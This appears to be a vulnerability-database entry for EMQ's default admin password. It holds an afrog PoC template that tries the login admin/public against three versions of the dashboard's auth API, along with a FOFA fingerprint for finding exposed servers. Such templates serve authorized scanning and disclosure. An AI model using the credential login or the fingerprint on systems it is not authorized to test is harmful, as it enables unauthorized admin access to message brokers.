EMQ-default-password: EMQ Default Password

日期: 2025-09-01 | 影响软件: EMQ | POC: 已公开

漏洞描述

EMQ default admin credentials were discovered. fofa: icon_hash="-670975485"

PoC代码[已公开]

id: EMQ-default-password

info:
    name: EMQ Default Password
    author: li1u.
    severity: high
    verified: true
    description: |
       EMQ default admin credentials were discovered.
       fofa: icon_hash="-670975485"

rules:
    r3:
        request:
            method: GET
            path: /
        expression: response.body.ibcontains(b'<title>Dashboard</title>')
        stop_if_mismatch: true
    r0:
        request:
            method: POST
            path: /api/v4/auth
            Content-Type: application/json
            body: '{"username":"admin","password":"public"}'
        expression: response.content_type.contains("application/json") && response.body.bcontains(b'"code":0')
        stop_if_match: true
    r1:
        request:
            method: POST
            path: /api/v3/auth
            Content-Type: application/json
            body: '{"username":"admin","password":"public"}'
        expression: response.content_type.contains("application/json") && response.body.bcontains(b'"code":0')
        stop_if_match: true
    r2:
        request:
            method: POST
            path: /api/v2/auth
            Content-Type: application/json
            body: '{"username":"admin","password":"public"}'
        expression: response.content_type.contains("application/json") && response.body.bcontains(b'"code":0') && response.body.bcontains(b'"result":[]')
        stop_if_match: true
expression: r3() && (r0() || r1() || r2())
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/emq-default-password.yaml

相关漏洞推荐